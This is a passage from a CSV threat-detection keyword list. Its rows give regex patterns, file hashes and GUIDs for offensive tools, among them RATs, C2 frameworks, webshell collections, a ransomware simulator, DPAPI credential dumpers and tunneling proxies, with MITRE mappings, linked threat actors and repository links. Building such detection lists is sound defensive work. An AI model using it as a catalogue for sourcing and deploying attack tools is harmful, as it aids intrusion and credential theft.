"*C2Server.cs*",".{0,1000}C2Server\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","36862" "*c2-server.mtattab.com/reverseShellClients*",".{0,1000}c2\-server\.mtattab\.com\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","36863" "*C2Server.ps1*",".{0,1000}C2Server\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","10","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","36864" "*c2server_arm_musl*",".{0,1000}c2server_arm_musl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36865" "*c2server_armv7*",".{0,1000}c2server_armv7.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36866" "*c2server_debug*",".{0,1000}c2server_debug.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36867" "*c2server_linux*",".{0,1000}c2server_linux.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","#linux","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36868" "*c2server_macos*",".{0,1000}c2server_macos.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36869" "*c2server_release*",".{0,1000}c2server_release.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36870" "*c2server_windows*",".{0,1000}c2server_windows.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36871" "*C2ServerThreadTerminated*",".{0,1000}C2ServerThreadTerminated.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","36872" "*c2-sessions ping*",".{0,1000}c2\-sessions\sping.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 
- T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","36873" "*c2-sessions quit*",".{0,1000}c2\-sessions\squit.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","36874" "*C2TaskMessage.*",".{0,1000}C2TaskMessage\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","36875" "*c2VydmVyMS5jaWEuZ292*",".{0,1000}c2VydmVyMS5jaWEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","36876" "*C2WebSocketHandler.*",".{0,1000}C2WebSocketHandler\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","36877" "*c3050fc06df213b534dcb6a9913efcd33c2eac91fd36467ef39376d335dc9c2a*",".{0,1000}c3050fc06df213b534dcb6a9913efcd33c2eac91fd36467ef39376d335dc9c2a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36878" "*c309739222c4a725894081fefa4884870487c01397a94da033bb7215d66752dd*",".{0,1000}c309739222c4a725894081fefa4884870487c01397a94da033bb7215d66752dd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","36880" "*c30d5ee79c92843970d8d413f7522569277e30ec2c4b73cbc42022f2945aa218*",".{0,1000}c30d5ee79c92843970d8d413f7522569277e30ec2c4b73cbc42022f2945aa218.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black 
Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","36881" "*c310f4109a827b1023e2398cdeb50f18a6620643360065369dac75192aea8420*",".{0,1000}c310f4109a827b1023e2398cdeb50f18a6620643360065369dac75192aea8420.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36882" "*c329eaeb077350fc1b002603d1ddfe5cfaea75109f02ff6dd86025112b0939b6*",".{0,1000}c329eaeb077350fc1b002603d1ddfe5cfaea75109f02ff6dd86025112b0939b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","36889" "*c330560d4cd9bf1a60b1d6d23d4f7b584f668965926f45fef8db96256fa66b39*",".{0,1000}c330560d4cd9bf1a60b1d6d23d4f7b584f668965926f45fef8db96256fa66b39.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36892" "*c3309f36c390a33a6eb46615bcd662c76e450b18d24fcb0aa8f1178f841ec7ad*",".{0,1000}c3309f36c390a33a6eb46615bcd662c76e450b18d24fcb0aa8f1178f841ec7ad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - 
T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36893" "*c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6*",".{0,1000}c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","36894" "*c332926e2e1de5a7c696feebfd5996c8b78ef9a380a9e4a8da85a3485f0f3288*",".{0,1000}c332926e2e1de5a7c696feebfd5996c8b78ef9a380a9e4a8da85a3485f0f3288.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","36895" "*c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908*",".{0,1000}c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36896" "*c338e7dea1af4808f1658121b1e22e50d3a1338f338a90aa4ac33b1a8a4271a1*",".{0,1000}c338e7dea1af4808f1658121b1e22e50d3a1338f338a90aa4ac33b1a8a4271a1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - 
T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36897" "*C33A0993-A331-406C-83F5-9357DF239B30*",".{0,1000}C33A0993\-A331\-406C\-83F5\-9357DF239B30.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#GUIDproject","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","36898" "*c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036*",".{0,1000}c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36900" "*C34208EA-8C33-473D-A9B4-53FB40347EA0*",".{0,1000}C34208EA\-8C33\-473D\-A9B4\-53FB40347EA0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#GUIDproject #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","36901" "*c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e*",".{0,1000}c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source 
cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36902" "*c34383371ae8b87dfd95ae52734239fa51b164c15eaabc18c40ba950b75e8e9e*",".{0,1000}c34383371ae8b87dfd95ae52734239fa51b164c15eaabc18c40ba950b75e8e9e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36903" "*c3444ec251cca27dd59adbfbc995f095550b7e7e25623f46799e03584845b3b9*",".{0,1000}c3444ec251cca27dd59adbfbc995f095550b7e7e25623f46799e03584845b3b9.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","36904" "*c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79*",".{0,1000}c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36905" "*C346B912-51F2-4A2E-ACC3-0AC2D28920C6*",".{0,1000}C346B912\-51F2\-4A2E\-ACC3\-0AC2D28920C6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","36906" "*c35130a44f7eb55c4a2a28f50d93e98ed60b383b5697ec09a7fe26fb52505a88*",".{0,1000}c35130a44f7eb55c4a2a28f50d93e98ed60b383b5697ec09a7fe26fb52505a88.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36907" "*c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8*",".{0,1000}c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36908" "*c353e6e63ab1b6ceb3c715db4b053d9b112b86b680c326134514b136658aede9*",".{0,1000}c353e6e63ab1b6ceb3c715db4b053d9b112b86b680c326134514b136658aede9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36909" "*c35aa22a683405cb282d97f125cb785cd7767591c96f4d00a27e5ac92b494f6c*",".{0,1000}c35aa22a683405cb282d97f125cb785cd7767591c96f4d00a27e5ac92b494f6c.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","36910" "*c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b*",".{0,1000}c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36911" "*c36141203951c47b30ecf138ab62132a35c5d50451b862333e64602020ae40b5*",".{0,1000}c36141203951c47b30ecf138ab62132a35c5d50451b862333e64602020ae40b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36914" "*c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f*",".{0,1000}c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","36916" "*c366f4e24e27994b39a860e046498ebebf9f9633f05a12dbd8ce65eed2a9f6f0*",".{0,1000}c366f4e24e27994b39a860e046498ebebf9f9633f05a12dbd8ce65eed2a9f6f0.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","36917" "*c369ef94296e539c96f7a8305587d3098f0491dcdcb0cd6d006e7e2df318d19a*",".{0,1000}c369ef94296e539c96f7a8305587d3098f0491dcdcb0cd6d006e7e2df318d19a.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","36918" "*c36ad4e21ecf39ba3c2c9c201c16dc4a54b46831d893f31865b95879d6487c7b*",".{0,1000}c36ad4e21ecf39ba3c2c9c201c16dc4a54b46831d893f31865b95879d6487c7b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36919" "*c36af69fbaa4c7daeb9d54f037f6fdc9917069483570081c6c094023b47e375a*",".{0,1000}c36af69fbaa4c7daeb9d54f037f6fdc9917069483570081c6c094023b47e375a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36920" "*c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf*",".{0,1000}c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - 
TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","36922" "*c37051ec2ad197c69fb617c478609636ab2ed040024957e12c5e0a6de3eddd03*",".{0,1000}c37051ec2ad197c69fb617c478609636ab2ed040024957e12c5e0a6de3eddd03.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36924" "*C373A937-312C-4C8D-BD04-BAAF568337E7*",".{0,1000}C373A937\-312C\-4C8D\-BD04\-BAAF568337E7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","36925" "*C37637FC-3792-4354-8F5B-7E319E4E5A6D*",".{0,1000}C37637FC\-3792\-4354\-8F5B\-7E319E4E5A6D.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","36926" "*c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596*",".{0,1000}c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 
- TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36927" "*c390b9308e62a0f72802c6c7edbbe83e35d893aff632c0f332538ee263994c29*",".{0,1000}c390b9308e62a0f72802c6c7edbbe83e35d893aff632c0f332538ee263994c29.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36930" "*c391bff39add68d2e9bd97ecfbc98850c2b80f831007df95704eedbc7e93617b*",".{0,1000}c391bff39add68d2e9bd97ecfbc98850c2b80f831007df95704eedbc7e93617b.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#filehash","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","36931" "*c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72*",".{0,1000}c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","36933" "*c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72*",".{0,1000}c39d2a1c303847785a2a2af357dd948f5e6ec8194eb427c52a391db90de34f72.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - 
